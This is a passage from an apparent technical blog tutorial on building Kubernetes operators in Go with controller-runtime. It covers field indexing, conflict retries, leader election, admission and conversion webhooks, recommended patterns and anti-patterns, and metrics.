    &lt;span class="k"&gt;func&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;obj&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Object&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;db&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="kt"&gt;string&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Spec&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;CredentialsSecret&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c"&gt;// Now you can efficiently list all DBs referencing a secret&lt;/span&gt;
&lt;span class="n"&gt;dbList&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;myv1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DatabaseList&lt;/span&gt;&lt;span class="p"&gt;{}&lt;/span&gt;
&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;List&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;dbList&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;MatchingFields&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s"&gt;".spec.credentialsSecret"&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="n"&gt;secretName&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Without an index, this &lt;code&gt;List&lt;/code&gt; does a full cache scan. With it, it's an O(1) lookup. At scale, this is the difference between a 1ms and 200ms reconciliation.&lt;/p&gt;

&lt;h3&gt;
  
  
  Optimistic Locking and Conflict Retries
&lt;/h3&gt;

&lt;p&gt;API server conflicts (&lt;code&gt;409 Conflict&lt;/code&gt;) are a normal part of operating at scale. When your reconciler reads an object, modifies it, and writes it back — and something else has modified it in between — you get a conflict. The correct response is to re-read and retry:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="s"&gt;"k8s.io/client-go/util/retry"&lt;/span&gt;

&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;retry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;RetryOnConflict&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;retry&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DefaultRetry&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;func&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="c"&gt;// Re-fetch to get the latest resourceVersion&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NamespacedName&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="c"&gt;// Apply your changes to the freshly-fetched object&lt;/span&gt;
    &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Phase&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;computedPhase&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Status&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;code&gt;retry.DefaultRetry&lt;/code&gt; retries up to 5 times with a 10ms base delay and 0.1 jitter; its backoff factor is 1.0, so the delay stays roughly constant rather than growing exponentially. For status updates this is usually sufficient. For spec updates, prefer server-side apply, which handles conflicts at the field-ownership level rather than requiring a full re-read/retry.&lt;/p&gt;
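&lt;p&gt;If the default is too tight for a heavily contended object, &lt;code&gt;RetryOnConflict&lt;/code&gt; accepts any &lt;code&gt;wait.Backoff&lt;/code&gt;. A minimal sketch; the step count and durations here are illustrative, not recommendations:&lt;/p&gt;

```go
package main

import (
	"time"

	"k8s.io/apimachinery/pkg/util/wait"
	"k8s.io/client-go/util/retry"
)

// contendedBackoff is a more patient, genuinely exponential backoff
// (DefaultRetry's Factor of 1.0 keeps delays flat).
var contendedBackoff = wait.Backoff{
	Steps:    8,                     // up to 8 attempts
	Duration: 20 * time.Millisecond, // initial delay
	Factor:   2.0,                   // double the delay each attempt
	Jitter:   0.1,                   // randomize to avoid thundering herds
}

// updateWithRetry wraps the same re-fetch/mutate/update closure
// shown above, but with the custom backoff.
func updateWithRetry(doUpdate func() error) error {
	return retry.RetryOnConflict(contendedBackoff, doUpdate)
}
```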





&lt;h2&gt;
  
  
  Leader Election
&lt;/h2&gt;

&lt;p&gt;In production, you run multiple replicas of your operator for high availability. But you don't want multiple replicas simultaneously reconciling the same objects — that leads to conflicts and thrashing. Leader election solves this.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fph1wqxo38obluiqhtwrm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fph1wqxo38obluiqhtwrm.png" alt="image" width="800" height="658"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Controller-runtime uses a &lt;strong&gt;Lease&lt;/strong&gt; object in the cluster as the distributed lock. The leader holds the lease by periodically renewing it. If the leader fails to renew before the lease expires, another replica acquires it.&lt;/p&gt;

&lt;p&gt;Configuration in controller-runtime:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;mgr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewManager&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cfg&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;ctrl&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Options&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;LeaderElection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;          &lt;span class="no"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;LeaderElectionID&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;        &lt;span class="s"&gt;"my-operator-leader"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;LeaderElectionNamespace&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s"&gt;"my-operator-system"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;LeaseDuration&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;           &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;leaseDuration&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c"&gt;// default 15s&lt;/span&gt;
    &lt;span class="n"&gt;RenewDeadline&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;           &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;renewDeadline&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="c"&gt;// default 10s&lt;/span&gt;
    &lt;span class="n"&gt;RetryPeriod&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;             &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;retryPeriod&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;    &lt;span class="c"&gt;// default 2s&lt;/span&gt;
&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Standby replicas still run the cache&lt;/strong&gt; — they maintain informers and local caches, but they don't start the controllers. This means failover is fast (no cold start for the informer sync) because the new leader already has a warm cache.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important nuance&lt;/strong&gt;: Leader election &lt;em&gt;reduces&lt;/em&gt; the likelihood of concurrent reconciliations, but it does not eliminate it entirely. During the lease expiry window, a brief overlap is possible where both the old and new leader are active. Controllers must still be written to tolerate conflicts and retries. Never assume strict single-threaded execution at the cluster level — your reconciler must be safe to run concurrently.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Caution&lt;/strong&gt;: Leader election adds latency to recovery. With &lt;code&gt;LeaseDuration=15s&lt;/code&gt;, a leader failure can cause up to 15 seconds of no-reconciliation. Tune this based on your operator's latency requirements.&lt;/p&gt;
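<p>The &lt;code&gt;leaseDuration&lt;/code&gt;, &lt;code&gt;renewDeadline&lt;/code&gt;, and &lt;code&gt;retryPeriod&lt;/code&gt; pointers in the manager options above are plain &lt;code&gt;time.Duration&lt;/code&gt; values. A sketch of a tighter configuration for latency-sensitive operators (values illustrative; the renew deadline must stay comfortably below the lease duration):</p>

```go
package main

import "time"

var (
	// A shorter lease means faster failover, but more load on the API
	// server and less tolerance for brief API-server unavailability.
	leaseDuration = 10 * time.Second // how long an acquired lease is valid
	renewDeadline = 7 * time.Second  // leader must renew within this window
	retryPeriod   = 2 * time.Second  // how often candidates retry acquisition
)
```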





&lt;h2&gt;
  
  
  Webhooks: Admission and Conversion
&lt;/h2&gt;

&lt;p&gt;Webhooks are the mechanism to inject logic into the API server's request pipeline.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyjlerewkctr4utbt6rsg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyjlerewkctr4utbt6rsg.png" alt="image" width="800" height="269"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Defaulting Webhooks (MutatingAdmissionWebhook)&lt;/strong&gt; run before storage and let you inject default field values. This is essential for forward compatibility — when you add a new required field to v2 of your CRD, a defaulting webhook can populate it for resources created without it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Validating Webhooks (ValidatingAdmissionWebhook)&lt;/strong&gt; run after mutation and let you reject invalid requests with human-readable error messages. This is where you enforce complex business rules that can't be expressed in OpenAPI schema (cross-field validation, external system checks, etc.).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Conversion Webhooks&lt;/strong&gt; are needed when you have multiple active API versions of a CRD. The API server stores objects in one version (the &lt;code&gt;storage: true&lt;/code&gt; version) but can serve them in other versions. Conversion webhooks handle the transformation between versions.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// controller-runtime webhook setup&lt;/span&gt;
&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Default&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Spec&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Replicas&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;defaultReplicas&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="kt"&gt;int32&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Spec&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Replicas&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;defaultReplicas&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;func&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Database&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;ValidateCreate&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;admission&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Warnings&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;error&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Spec&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;StorageSize&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Cmp&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;minStorage&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fmt&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Errorf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"storage size must be at least %s"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;minStorage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;String&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
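<p>Conversion webhooks are typically implemented with controller-runtime's Hub/Convertible pattern: the storage version is the "hub" and every other version converts to and from it. A minimal sketch, assuming &lt;code&gt;v1&lt;/code&gt; is the storage version; the type and field names are illustrative:</p>

```go
// In the v1 (storage) package: mark the hub version.
func (*Database) Hub() {}

// In the v1beta1 (spoke) package: convert to and from the hub.
func (src *Database) ConvertTo(dstRaw conversion.Hub) error {
	dst := dstRaw.(*v1.Database)
	dst.ObjectMeta = src.ObjectMeta
	// Example transformation: v1 moved the flat field into a struct.
	dst.Spec.Storage.Size = src.Spec.StorageSize
	return nil
}

func (dst *Database) ConvertFrom(srcRaw conversion.Hub) error {
	src := srcRaw.(*v1.Database)
	dst.ObjectMeta = src.ObjectMeta
	dst.Spec.StorageSize = src.Spec.Storage.Size
	return nil
}
```

<p>The API server calls the webhook with whole objects; controller-runtime's &lt;code&gt;conversion&lt;/code&gt; package routes each spoke through the hub, so n versions need 2n conversion functions instead of n&#178;.</p>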



&lt;p&gt;Webhooks require TLS certificates, and the webhook server must be reachable before the API server can call it. Certificate management is operationally annoying; use cert-manager to provision and rotate certificates (controller-runtime's &lt;code&gt;certwatcher&lt;/code&gt; picks up rotated certificates without a restart).&lt;/p&gt;





&lt;h2&gt;
  
  
  Operator Patterns and Anti-Patterns
&lt;/h2&gt;

&lt;p&gt;After years of writing and reviewing operators, here's the distilled wisdom:&lt;/p&gt;

&lt;h3&gt;
  
  
  Patterns to Follow
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Adopt Server-Side Apply Whenever Possible&lt;/strong&gt;: Use server-side apply (&lt;code&gt;client.Apply&lt;/code&gt;) instead of create-or-update. It's declarative, handles field ownership correctly, and is idempotent by design. One critical caveat: if you adopt SSA, use it &lt;em&gt;consistently&lt;/em&gt; for all managed resources. Mixing &lt;code&gt;Update&lt;/code&gt; and &lt;code&gt;Apply&lt;/code&gt; on the same fields causes &lt;code&gt;managedFields&lt;/code&gt; ownership conflicts that are painful to debug and resolve.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="c"&gt;// Instead of create-or-update dance:&lt;/span&gt;
&lt;span class="n"&gt;patch&lt;/span&gt; &lt;span class="o"&gt;:=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Apply&lt;/span&gt;
&lt;span class="n"&gt;obj&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ManagedFields&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="no"&gt;nil&lt;/span&gt;  &lt;span class="c"&gt;// Let SSA manage this&lt;/span&gt;
&lt;span class="n"&gt;err&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Patch&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;obj&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;patch&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ForceOwnership&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;FieldOwner&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"my-operator"&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Use Patch over Update&lt;/strong&gt;: Always prefer &lt;code&gt;Patch&lt;/code&gt; (specifically strategic merge patch or JSON patch) over &lt;code&gt;Update&lt;/code&gt; for status and spec changes. &lt;code&gt;Update&lt;/code&gt; replaces the entire object and is prone to conflicts; &lt;code&gt;Patch&lt;/code&gt; is surgical and conflict-resistant.&lt;/p&gt;
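<p>With controller-runtime, the usual shape is &lt;code&gt;client.MergeFrom&lt;/code&gt; against a deep copy taken before mutation. A minimal sketch, reusing the &lt;code&gt;db&lt;/code&gt; and &lt;code&gt;r&lt;/code&gt; names from the earlier snippets:</p>

```go
// Snapshot the object before mutating it; the patch sent to the API
// server is computed as the diff between snapshot and mutated object.
base := db.DeepCopy()

db.Status.Phase = "Ready"
db.Status.ObservedGeneration = db.Generation

// Sends only the changed fields, not the whole object.
if err := r.Status().Patch(ctx, db, client.MergeFrom(base)); err != nil {
	return ctrl.Result{}, err
}
```

<p>Note that a plain merge patch carries no &lt;code&gt;resourceVersion&lt;/code&gt; precondition; if the write must fail on concurrent modification, build the patch with &lt;code&gt;client.MergeFromWithOptions(base, client.MergeFromWithOptimisticLock{})&lt;/code&gt; instead.</p>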

&lt;p&gt;&lt;strong&gt;Emit Events&lt;/strong&gt;: Use the Event recorder to emit Kubernetes events for significant state transitions. This gives users visibility via &lt;code&gt;kubectl describe&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Recorder&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Event&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;db&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;corev1&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;EventTypeWarning&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"ProvisioningFailed"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Failed to create PVC"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Separate controllers for separate concerns&lt;/strong&gt;: Don't build a monolithic reconciler. If your operator manages both the database cluster and its backup schedule, use two controllers with a shared cache.&lt;/p&gt;

&lt;h3&gt;
  
  
  Anti-Patterns to Avoid
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Don't store state in the controller process.&lt;/strong&gt; Your controller can be restarted, scaled, or fail over at any moment. The only source of truth is the Kubernetes API. If you need to persist computed state, put it in &lt;code&gt;status&lt;/code&gt; or in a ConfigMap.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Don't busy-loop with short requeue intervals.&lt;/strong&gt; In most cases, sub-10-second polling intervals are unnecessary and wasteful. Prefer watch-based triggers unless the external system cannot emit events. For fast-moving, short-lived state machines (e.g., managing transient Jobs), shorter intervals may be valid — but they should be the exception, not the default. If you truly need polling, make the interval configurable so it can be tuned per deployment.&lt;/p&gt;
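<p>When polling is genuinely required, one way to keep the interval tunable is to thread it through the reconciler struct; the field name here is illustrative:</p>

```go
type Reconciler struct {
	client.Client
	// PollInterval is set from a flag or config file,
	// e.g. --poll-interval=30s, rather than hard-coded.
	PollInterval time.Duration
}

func (r *Reconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
	// ... reconcile logic ...

	// Re-queue after the configured interval.
	return ctrl.Result{RequeueAfter: r.PollInterval}, nil
}
```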

&lt;p&gt;&lt;strong&gt;Don't ignore &lt;code&gt;resourceVersion&lt;/code&gt; conflicts.&lt;/strong&gt; A &lt;code&gt;409 Conflict&lt;/code&gt; from the API server means someone else updated the object between your read and write. The correct response is to re-fetch and retry, not to log and continue.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Don't call the API server inside tight loops.&lt;/strong&gt; Fetching all pods to check readiness in a loop that runs every reconciliation is expensive. Use the cache, or precompute what you need at the start of reconciliation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Don't use &lt;code&gt;Update&lt;/code&gt; when &lt;code&gt;Patch&lt;/code&gt; will do.&lt;/strong&gt; Using &lt;code&gt;r.Update(ctx, obj)&lt;/code&gt; after modifying the spec will overwrite any changes made between your read and your write. Prefer patch operations.&lt;/p&gt;





&lt;h2&gt;
  
  
  Observability and Debugging
&lt;/h2&gt;

&lt;p&gt;An operator you can't observe is an operator you can't trust in production.&lt;/p&gt;

&lt;h3&gt;
  
  
  Metrics
&lt;/h3&gt;

&lt;p&gt;Controller-runtime exports Prometheus metrics out of the box:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Work queue depth — a leading indicator of reconciliation backlog
workqueue_depth{name="database"} 42

# Reconcile duration histogram — p99 tells you about slow reconciliations
controller_runtime_reconcile_time_seconds_bucket{controller="database", le="0.1"} 1000

# Reconcile errors — should be near zero in steady state
controller_runtime_reconcile_errors_total{controller="database"} 5

# How long processing a work item takes once dequeued
workqueue_work_duration_seconds_bucket{name="database"}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Always add custom metrics for your domain:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight go"&gt;&lt;code&gt;&lt;span class="k"&gt;var&lt;/span&gt; &lt;span class="n"&gt;databasesProvisioning&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;prometheus&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;NewGauge&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prometheus&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;GaugeOpts&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
